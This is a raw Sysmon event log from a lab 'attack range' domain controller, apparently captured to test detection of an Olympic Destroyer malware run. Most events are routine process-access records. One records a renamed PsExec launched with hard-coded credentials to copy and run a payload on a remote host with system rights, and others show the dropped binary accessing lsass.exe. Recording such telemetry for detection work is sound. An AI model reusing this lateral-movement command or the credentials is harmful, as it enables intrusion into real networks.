10:56:42.167{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.167{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5605-000000003802}5232C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.163{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5705-000000003802}5208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.145{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-5705-000000003802}5208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:42.130{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000290192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11F-6215-1200-000000003802}81628C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000290191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11F-6215-1200-000000003802}81628C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000290190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11C-6215-0A00-000000003802}620688C:\Windows\system32\services.exe{C8EA50B7-12EA-6216-5605-000000003802}5232C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.099{C8EA50B7-F11F-6215-1200-000000003802}81628C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000290184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.083{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5605-000000003802}5232C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.083{C8EA50B7-F11C-6215-0A00-000000003802}620820C:\Windows\system32\services.exe{C8EA50B7-12EA-6216-5605-000000003802}5232C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.067{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.067{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.067{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+1b8ad|C:\Windows\system32\lsasrv.dll+2878b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E4DD22E3A652BFF0C53FFBC37989E1A,SHA256=36FDFAC9AA47D262B9653CF35C26A6EF40771CCFEB042B3ACCA7194A420A82C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.045{C8EA50B7-F11F-6215-1200-000000003802}81628C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000290177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.014{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.014{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.013{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.998{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.998{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5405-000000003802}7116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.998{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5405-000000003802}7116C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.967{C8EA50B7-12E9-6216-5405-000000003802}71167132C:\Windows\system32\conhost.exe{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.967{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 